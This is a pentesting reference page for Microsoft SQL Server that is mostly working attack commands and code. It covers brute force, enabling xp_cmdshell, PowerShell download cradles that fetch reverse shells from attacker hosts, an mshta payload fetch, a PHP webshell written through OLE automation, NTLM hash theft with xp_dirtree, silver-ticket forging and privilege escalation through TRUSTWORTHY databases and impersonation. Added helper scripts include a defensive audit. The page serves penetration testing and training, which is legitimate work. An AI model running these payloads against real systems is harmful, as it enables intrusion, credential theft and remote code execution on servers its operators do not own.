1433 - Pentesting MSSQL - Microsoft SQL Server


Basic Information

From wikipedia:

Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications, which may run either on the same computer or on another computer across a network (including the Internet).

Default port: 1433

1433/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM

Moving to a managed Database-as-a-Service (DBaaS)

Every operation that relies on "owning the host" (for example privilege escalation, lateral movement and OS command execution) no longer applies in a DBaaS. Pentesting in these environments has to shift towards application-layer exploitation, data exfiltration through SQL logic, misconfigured IAM roles, or poor network/VPC design. For example, the Amazon RDS documentation explicitly states that xp_cmdshell and the TRUSTWORTHY database property are not supported.

Warning

You get a database endpoint, not a server. The cloud provider manages the host OS, the database engine binaries and many of the security policies.

Default MS-SQL System Tables

  • master Database: This database is crucial as it records all system-level details for an instance of SQL Server.
  • msdb Database: SQL Server Agent uses this database to manage the scheduling of alerts and jobs.
  • model Database: Acts as a blueprint for every new database on the SQL Server instance; any changes such as size, collation, recovery model and so on are mirrored in newly created databases.
  • Resource Database: A read-only database that houses the system objects shipped with SQL Server. These objects, while physically stored in the Resource database, are logically presented in the sys schema of every database.
  • tempdb Database: Serves as a temporary storage area for transient objects or intermediate result sets.

Enumeration

Automatic Enumeration

If you don't know anything about the service:

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
msf> use auxiliary/scanner/mssql/mssql_ping

Tip

If you don't have credentials you can try to guess them. You can use nmap or metasploit. Be careful: if you fail to log in several times using an existing username you may lock the account.

Metasploit (needs creds)

#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used

#Steal NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder

#Info gathering
msf> use admin/mssql/mssql_enum #Security checks
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

#Search for interesting data
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf

#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin

#Code execution
msf> use admin/mssql/mssql_exec #Execute commands
msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload

#Add new admin user from meterpreter session
msf> use windows/manage/mssql_local_auth_bypass

Brute force

User enumeration via RID brute force

You can enumerate domain users by brute-forcing RIDs (Relative Identifiers) through MSSQL. This technique is useful when you have valid credentials but limited privileges:

# Using NetExec (nxc) - formerly CrackMapExec
nxc mssql <IP> --local-auth -u <username> -p '<password>' --rid-brute 5000

# Examples:
nxc mssql 10.129.234.50 --local-auth -u sqlguest -p 'zDPBpaF4FywlqIv11vii' --rid-brute 5000
nxc mssql 10.10.10.59 -u sa -p 'P@ssw0rd' --rid-brute 10000

# Without --local-auth for domain accounts
nxc mssql 10.10.10.59 -u DOMAIN\\user -p 'password' --rid-brute 5000


...
MSSQL                    10.129.234.50   1433   DC               1104: REDELEGATE\Christine.Flanders
MSSQL                    10.129.234.50   1433   DC               1105: REDELEGATE\Marie.Curie
MSSQL                    10.129.234.50   1433   DC               1106: REDELEGATE\Helen.Frost
MSSQL                    10.129.234.50   1433   DC               1107: REDELEGATE\Michael.Pontiac
MSSQL                    10.129.234.50   1433   DC               1108: REDELEGATE\Mallory.Roberts
MSSQL                    10.129.234.50   1433   DC               1109: REDELEGATE\James.Dinkleberg
...

Parameters:

  • --local-auth: Use local (SQL) authentication instead of domain authentication
  • --rid-brute <max_rid>: Brute-force RIDs up to the given value (default: 4000)
  • -u: Username
  • -p: Password

This technique enumerates users by asking the MSSQL server for the account information associated with sequential RIDs.

Manual Enumeration

Login

MSSQLPwner

# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt

# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt

# Bruteforce using tickets against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt

# Bruteforce using passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt

# Bruteforce using hashes against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt

# Using Impacket mssqlclient.py
mssqlclient.py [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
## Recommended -windows-auth when you are going to use a domain. Use as domain the netBIOS name of the machine
mssqlclient.py [-db volume] -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>

# Using sqsh
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
## In case Windows Auth using "." as domain name for local user
sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
## In sqsh you need to use GO after writing the query to send it
1> select 1;
2> go

Common Enumeration

# Get version
select @@version;
# Get user
select user_name();
# Get databases
SELECT name FROM master.dbo.sysdatabases;
# Use database
USE master

#Get table names
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
EXEC sp_addsrvrolemember 'hacker', 'sysadmin'

#Enumerate links
enum_links
#Use a link
use_link [NAME]

Get Users

Types of MSSQL Users

# Get all the users and roles
select * from sys.database_principals;
## This query filters a bit the results
select name,
create_date,
modify_date,
type_desc as type,
authentication_type_desc as authentication_type,
sid
from sys.database_principals
where type not in ('A', 'R')
order by name;

## Both of these select all the users of the current database (not the server).
## Interesting when you cannot access the table sys.database_principals
EXEC sp_helpuser
SELECT * FROM sysusers

Get Permissions

  1. Securable: defined as a resource managed by SQL Server for access control. These are grouped into:
  • Server – examples include databases, logins, endpoints, availability groups and server roles.
  • Database – examples include database roles, application roles, schemas, certificates, full-text catalogs and users.
  • Schema – includes tables, views, procedures, functions, synonyms, etc.
  2. Permission: associated with SQL Server securables; permissions such as ALTER, CONTROL and CREATE can be granted to a principal. Permissions are managed at two levels:
  • Server level using logins
  • Database level using users
  3. Principal: the entity that is granted permissions on a securable. Principals are mainly logins and database users. Access to securables is controlled by granting or denying permissions, or by adding logins and users to roles that hold the required rights.

# Show all different securables names
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
# Show all possible permissions in MSSQL
SELECT * FROM sys.fn_builtin_permissions(DEFAULT);
# Get all my permissions over securable type SERVER
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
# Get all my permissions over a database
USE <database>
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
# Get members of the role "sysadmin"
Use master
EXEC sp_helpsrvrolemember 'sysadmin';
# Get if the current user is sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
# Get users that can run xp_cmdshell
Use master
EXEC sp_helprotect 'xp_cmdshell'

Tricks

Execute OS Commands

Caution

Note that in order to execute commands it's not only necessary to have xp_cmdshell enabled, but also to hold the EXECUTE permission on the xp_cmdshell stored procedure. You can list who (apart from sysadmins) can use xp_cmdshell with:

Use master
EXEC sp_helprotect 'xp_cmdshell'
# Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'

# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
#This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE

#One liner
EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
# Get Rev shell
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'

# Bypass blacklisted "EXEC xp_cmdshell" (the procedure name is passed through a variable; the trailing -- comments out the rest of the query)
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' --

MSSQLPwner

# Executing custom assembly on the current server with windows authentication and executing hostname command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname

# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname

# Executing the hostname command using stored procedures on the linked SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname

# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate

WMI-based remote SQL collection (sqlcmd + CSV export)

Operators can pivot from an IIS/app tier to SQL Servers over WMI, running a small batch that authenticates to MSSQL, executes ad-hoc queries and exports the results to CSV. This keeps collection simple and blends in with admin activity.

Example mssq.bat

@echo off
rem Usage: mssq.bat <server> <user> <pass> <"SQL"> <out.csv>
set S=%1
set U=%2
set P=%3
set Q=%4
set O=%5
rem Remove headers, trim trailing spaces, CSV separator = comma
sqlcmd -S %S% -U %U% -P %P% -Q "SET NOCOUNT ON; %Q%" -W -h -1 -s "," -o "%O%"

Invoke it remotely via WMI

wmic /node:SQLHOST /user:DOMAIN\user /password:Passw0rd! process call create "cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd \"SELECT TOP(100) name FROM sys.tables\" C:\\Windows\\Temp\\out.csv"

PowerShell alternative

$cmd = 'cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd "SELECT name FROM sys.databases" C:\\Windows\\Temp\\dbs.csv'
Invoke-WmiMethod -ComputerName SQLHOST -Class Win32_Process -Name Create -ArgumentList $cmd

Notes

  • sqlcmd may be missing; fall back to osql, PowerShell Invoke-Sqlcmd, or a one-liner based on System.Data.SqlClient.
  • Be careful with quoting; long or complex queries are easier to supply from a file, or as a Base64-encoded argument that is decoded inside the batch/PowerShell stub.
  • Exfil the CSV over SMB (for example by copying it from \\SQLHOST\C$\Windows\Temp), or compress it and move it through your C2.

Get Hashed Passwords

SELECT * FROM master.sys.syslogins;

Steal NetNTLM hash / Relay attack

You should start an SMB server to capture the hash used in the authentication (impacket-smbserver or responder, for example).

xp_dirtree '\\<attacker_IP>\any\thing'
exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
EXEC master..xp_subdirs '\\<attacker_IP>\anything\'
EXEC master..xp_fileexist '\\<attacker_IP>\anything\'

# Capture hash
sudo responder -I tun0
sudo impacket-smbserver share ./ -smb2support
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer

MSSQLPwner

# Issuing NTLM relay attack on the SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on the local server with custom command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250

Warning

You can check who (apart from sysadmins) has permission to run these MSSQL functions with:

Use master;
EXEC sp_helprotect 'xp_dirtree';
EXEC sp_helprotect 'xp_subdirs';
EXEC sp_helprotect 'xp_fileexist';

Using tools such as responder or Inveigh it's possible to steal the NetNTLM hash.
You can see how to use these tools in:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

From NetNTLMv2 capture to MSSQL silver ticket (PAC group injection)

  • Capture the SQL Server service account's NetNTLMv2 with Responder via xp_dirtree '\\\\<attacker_ip>\\share' (crack it with Hashcat mode 5600).
  • Derive the service NTLM hash from the recovered password:
python3 - <<'PY'
import hashlib
# NT hash = MD4 over the UTF-16LE encoded password.
# On OpenSSL 3 builds md4 lives in the "legacy" provider and hashlib may raise
# "unsupported hash type"; pycryptodome's Crypto.Hash.MD4 is a drop-in alternative.
print(hashlib.new("md4", "<PASSWORD>".encode("utf-16le")).hexdigest())
PY
  • Use SELECT SUSER_SID('DOMAIN\\Domain Users'); to obtain the domain SID bytes (RID = last 4 bytes, little endian). Map/brute-force RIDs with nxc mssql ... --rid-brute to find the group that was granted sysadmin (e.g. RID 1105).
  • Forge a silver ticket for the MSSQL SPN, injecting the privileged group RID into the PAC:
ticketer.py -nthash <SERVICE_NTLM> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn MSSQLSvc/<fqdn>:1433 -groups <GROUP_RID> <user_to_impersonate>
KRB5CCNAME=<user_to_impersonate>.ccache mssqlclient.py -no-pass -k <fqdn>
  • Enable xp_cmdshell if needed; commands run as the SQL Server service account even when impersonating through the forged ticket.
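Helpers for the SUSER_SID()/RID step above, added here as an example that is not part of the original page: decode the varbinary SID a T-SQL client prints, split off the RID (last four little-endian bytes), rebuild the SID for a RID seen in --rid-brute output, and parse nxc's output lines. The SID bytes are constructed; the account names are the ones from the snippet above.

```python
"""SID helpers for the SUSER_SID() / --rid-brute workflow (added example)."""
import re
import struct

# Constructed varbinary as SUSER_SID('DOMAIN\\Domain Users') might return it
# (clients print it as 0x...). Layout: revision (1 byte) | sub-authority count
# (1 byte) | identifier authority (6 bytes, big endian) | N sub-authorities
# (4 bytes each, little endian). The last sub-authority is the RID.
SAMPLE_SID_HEX = "0x0105000000000005" "15000000" "d2029649" "b168de3a" "39300000" "51040000"


def sid_bytes_to_string(raw: bytes) -> str:
    """Decode a binary SID into its textual S-1-5-21-... form."""
    if len(raw) < 8:
        raise ValueError("SID too short")
    revision, count = raw[0], raw[1]
    if revision != 1 or len(raw) != 8 + 4 * count:
        raise ValueError("malformed SID")
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack("<%dI" % count, raw[8:])
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def sid_hex_to_string(hex_value: str) -> str:
    """Accept the 0x-prefixed hex that T-SQL clients print for varbinary."""
    h = hex_value[2:] if hex_value.lower().startswith("0x") else hex_value
    return sid_bytes_to_string(bytes.fromhex(h))


def sid_string_to_bytes(sid: str) -> bytes:
    """Inverse of sid_bytes_to_string, e.g. to compare with sys.server_principals.sid."""
    parts = sid.split("-")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def split_domain_sid(sid: str):
    """Split 'S-1-5-21-a-b-c-RID' into ('S-1-5-21-a-b-c', RID)."""
    parts = sid.split("-")
    if len(parts) < 5 or parts[:2] != ["S", "1"]:
        raise ValueError("not a SID: %r" % sid)
    return "-".join(parts[:-1]), int(parts[-1])


def build_sid(domain_sid: str, rid: int) -> str:
    """Domain SID + RID -> full SID of a user or group."""
    return "%s-%d" % (domain_sid, rid)


# Matches the "<rid>: <DOMAIN\\account>" tail of an nxc --rid-brute line.
NXC_RID_LINE = re.compile(r"(\d+):\s+(\S+)\s*$")


def parse_rid_brute_output(lines):
    """Map RID -> account name from nxc --rid-brute output; other lines are ignored."""
    found = {}
    for line in lines:
        m = NXC_RID_LINE.search(line)
        if m:
            found[int(m.group(1))] = m.group(2)
    return found


if __name__ == "__main__":
    group_sid = sid_hex_to_string(SAMPLE_SID_HEX)
    domain_sid, rid = split_domain_sid(group_sid)
    print(group_sid, "->", domain_sid, "RID", rid)
    print(build_sid(domain_sid, 1106))
```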

Read this post to find more information about how this feature can be abused:

MSSQL AD Abuse

Write Files

To write files using MSSQL we need to enable Ole Automation Procedures, which requires admin privileges, and then execute some stored procedures to create the file:

# Enable Ole Automation Procedures
sp_configure 'show advanced options', 1
RECONFIGURE

sp_configure 'Ole Automation Procedures', 1
RECONFIGURE

# Create a File
DECLARE @OLE INT
DECLARE @FileID INT
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE

Read files with OPENROWSET

By default, MSSQL allows reading any file in the operating system to which the service account has read access. We can use the following SQL query:

SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents

However, the BULK option requires the ADMINISTER BULK OPERATIONS or the ADMINISTER DATABASE BULK OPERATIONS permission.

# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTER BULK OPERATIONS' OR permission_name='ADMINISTER DATABASE BULK OPERATIONS';

Error-based SQLi vector:

https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--

RCE / Read files executing scripts (Python and R)

MSSQL may allow you to execute scripts in Python and/or R. This code is executed by a different user than the one running commands through xp_cmdshell.

Example: trying to execute an R "Hello World!" that is not working:

Example: using the configured Python runtime to perform several actions:

# Print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
#Open and read a file
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
#Multiline
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
import sys
print(sys.version)
'
GO

Read Registry

Microsoft SQL Server provides multiple extended stored procedures that allow you to interact not only with the network but also with the file system and even the Windows Registry:

Regular                          Instance-aware
sys.xp_regread                   sys.xp_instance_regread
sys.xp_regenumvalues             sys.xp_instance_regenumvalues
sys.xp_regenumkeys               sys.xp_instance_regenumkeys
sys.xp_regwrite                  sys.xp_instance_regwrite
sys.xp_regdeletevalue            sys.xp_instance_regdeletevalue
sys.xp_regdeletekey              sys.xp_instance_regdeletekey
sys.xp_regaddmultistring         sys.xp_instance_regaddmultistring
sys.xp_regremovemultistring      sys.xp_instance_regremovemultistring

# Example read registry
EXECUTE master.sys.xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Microsoft SQL Server\MSSQL12.SQL2014\SQLServerAgent', 'WorkingDirectory';
# Example write and then read registry
EXECUTE master.sys.xp_instance_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue', 'REG_SZ', 'Now you see me!';
EXECUTE master.sys.xp_instance_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue';
# Example to check who can use these functions
Use master;
EXEC sp_helprotect 'xp_regread';
EXEC sp_helprotect 'xp_regwrite';

For more examples check the original source.

RCE with MSSQL User Defined Function - SQLHttp

It's possible to load a .NET dll within MSSQL through custom functions. This, however, requires dbo access, so you need to connect to the database as sa or with an Administrator role.

Follow this link to see an example.

RCE with autoadmin_task_agents

According to this post, it's also possible to load a remote dll and make MSSQL execute it with something like:

update autoadmin_task_agents set task_assembly_name = 'class.dll', task_assembly_path='\\remote-server\\ping.dll', className='Class1.Class1';

With a dll such as:

using Microsoft.SqlServer.SmartAdmin;
using System;
using System.Diagnostics;

namespace Class1
{
    public class Class1 : TaskAgent
    {
        public Class1()
        {
            Process process = new Process();
            process.StartInfo.FileName = "cmd.exe";
            process.StartInfo.Arguments = "/c ping localhost -t";
            process.StartInfo.UseShellExecute = false;
            process.StartInfo.RedirectStandardOutput = true;
            process.Start();
            process.WaitForExit();
        }

        public override void DoWork()
        {
        }

        public override void ExternalJob(string command, LogBaseService jobLogger)
        {
        }

        public override void Start(IServicesFactory services)
        {
        }

        public override void Stop()
        {
        }

        public void Test()
        {
        }
    }
}

Other ways for RCE

There are other methods to get command execution, such as adding extended stored procedures, CLR Assemblies, SQL Server Agent Jobs, and external scripts.

MSSQL Privilege Escalation

From db_owner to sysadmin

If a regular user is given the role db_owner over a database owned by an admin user (such as sa) and that database is configured as trustworthy, that user can abuse these privileges to privesc, because stored procedures created in that database can execute as the owner (admin).

# Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases

# Find trustworthy databases
SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;

# Get roles over the selected database (look for your username as db_owner)
USE <trustworthy_db>
SELECT rp.name as database_role, mp.name as database_user
from sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)

# If you found you are db_owner of a trustworthy database, you can privesc:
--1. Create a stored procedure to add your user to sysadmin role
USE <trustworthy_db>

CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'USERNAME','sysadmin'

--2. Execute stored procedure to get sysadmin role
USE <trustworthy_db>
EXEC sp_elevate_me

--3. Verify your user is a sysadmin
SELECT is_srvrolemember('sysadmin')
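The precondition described in this section can be checked from the defender's side. The following added example (not code from the page) runs that check over constructed rows shaped like the results of the queries above; database, login and user names are invented, and for simplicity it assumes a database user carries the same name as its login (in practice match them on sid).

```python
"""Audit the db_owner -> sysadmin precondition (added example, constructed data)."""

# SELECT name, suser_sname(owner_sid), is_trustworthy_on FROM sys.databases
DATABASES = [
    {"name": "master",  "owner": "sa",      "trustworthy": 1},  # TRUSTWORTHY by design
    {"name": "AppDB",   "owner": "sa",      "trustworthy": 1},
    {"name": "Reports", "owner": "sa",      "trustworthy": 0},
    {"name": "Staging", "owner": "devlead", "trustworthy": 1},
]
SYSADMINS = {"sa"}  # EXEC sp_helpsrvrolemember 'sysadmin'
# db_owner members per database (sys.database_role_members joined on sys.database_principals)
DB_OWNER_MEMBERS = {
    "AppDB":   {"dbo", "appuser"},
    "Reports": {"dbo", "reportuser"},
    "Staging": {"dbo", "devlead"},
}
# SELECT name, value_in_use FROM sys.configurations
CONFIG = {"xp_cmdshell": 1, "Ole Automation Procedures": 0,
          "external scripts enabled": 0, "show advanced options": 1}

SYSTEM_DBS = {"master", "msdb", "tempdb", "model"}
RISKY_OPTIONS = ("xp_cmdshell", "Ole Automation Procedures", "external scripts enabled")


def trustworthy_escalation_paths(databases, db_owner_members, sysadmins):
    """Return (database, user) pairs matching the escalation precondition:
    a TRUSTWORTHY user database owned by a sysadmin that has a db_owner member
    who is not already sysadmin. 'dbo' is the owner's own mapping and is skipped."""
    findings = []
    for db in databases:
        if db["name"] in SYSTEM_DBS or not db["trustworthy"]:
            continue
        if db["owner"] not in sysadmins:
            continue  # EXECUTE AS OWNER would only yield the owner's (non-sysadmin) rights
        for user in sorted(db_owner_members.get(db["name"], ())):
            if user != "dbo" and user not in sysadmins:
                findings.append((db["name"], user))
    return findings


def enabled_risky_options(config):
    """Server options that widen the impact once a privesc succeeds."""
    return [opt for opt in RISKY_OPTIONS if config.get(opt) == 1]


def remediation_sql(findings):
    """Remove the trust relationship that makes EXECUTE AS OWNER dangerous
    (alternatively re-own the database with a non-sysadmin login)."""
    return ["ALTER DATABASE [%s] SET TRUSTWORTHY OFF;" % db for db, _ in findings]


if __name__ == "__main__":
    paths = trustworthy_escalation_paths(DATABASES, DB_OWNER_MEMBERS, SYSADMINS)
    for db, user in paths:
        print("db_owner %r on TRUSTWORTHY database %r owned by a sysadmin" % (user, db))
    print("risky options enabled:", enabled_risky_options(CONFIG))
    print("\n".join(remediation_sql(paths)))
```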

You can use a metasploit module:

msf> use auxiliary/admin/mssql/mssql_escalate_dbowner

Or a PS script:

# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1
Import-Module .\Invoke-SqlServerDbElevateDbOwner.psm1
Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlServerInstance 10.2.2.184

Impersonation of other users

SQL Server has a special permission named IMPERSONATE that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends.

# Find users you can impersonate
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
# Check if the user "sa" or any other high privileged user is mentioned

# Impersonate sa user
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')

# If you can't find any users, make sure to check for links
enum_links
# If there is a link of interest, re-run the above steps on each link
use_link [NAME]

Tip

If you can impersonate a user, even if he isn't sysadmin, you should check whether that user has access to other databases or linked servers.

Note that once you are sysadmin you can impersonate any other user:

-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
-- Verify you are now running as the RegUser login
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- Change back to sa
REVERT

You can perform this attack with a metasploit module:

msf> use auxiliary/admin/mssql/mssql_escalate_execute_as

Or with a PS script:

# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1
Import-Module .\Invoke-SqlServer-Escalate-ExecuteAs.psm1
Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword!

Using MSSQL for Persistence

https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/

Extracting passwords from SQL Server Linked Servers

An attacker can extract SQL Server Linked Servers passwords from the SQL Instances and get them in clear text, granting the attacker passwords that can be used to acquire a greater foothold on the target. The script to extract and decrypt the passwords stored for the Linked Servers can be found here

Some requirements and configurations must be in place for this exploit to work. First of all, you must have Administrator rights on the machine, or the ability to manage the SQL Server configuration.

After validating your permissions, you need to configure the following three things:

  1. Enable TCP/IP on the SQL Server instance;
  2. Add a startup parameter, in this case a trace flag, namely -T7806;
  3. Enable the remote admin connection.

To automate these configurations, this repository has the needed scripts. Besides a powershell script for each configuration step, the repository also has a full script that combines the configuration scripts with the extraction and decryption of the passwords.

For further information, refer to the following link regarding this attack: Decrypting MSSQL Database Link Server Passwords

Troubleshooting the SQL Server Dedicated Administrator Connection

Local Privilege Escalation

The user running the MSSQL server will have the privilege token SeImpersonatePrivilege enabled.
You will probably be able to escalate to Administrator following one of these two pages:

RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

JuicyPotato

Shodan

  • port:1433 !HTTP

References

HackTricks Automatic Commands

Protocol_Name: MSSQL    #Protocol Abbreviation if there is one.
Port_Number:  1433     #Comma separated if there is more than one.
Protocol_Description: Microsoft SQL Server         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MSSQL
Note: |
Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).

#sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G

###the goal is to get xp_cmdshell working###
1. try and see if it works
xp_cmdshell `whoami`
go

2. try to turn component back on
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell `whoami`
go

3. 'advanced' turn it back on
EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell 'whoami'
go




xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')"


https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html

Entry_2:
Name: Nmap for SQL
Description: Nmap with SQL Scripts
Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP}

Entry_3:
Name: MSSQL consoleless msf enumeration
Description: MSSQL enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
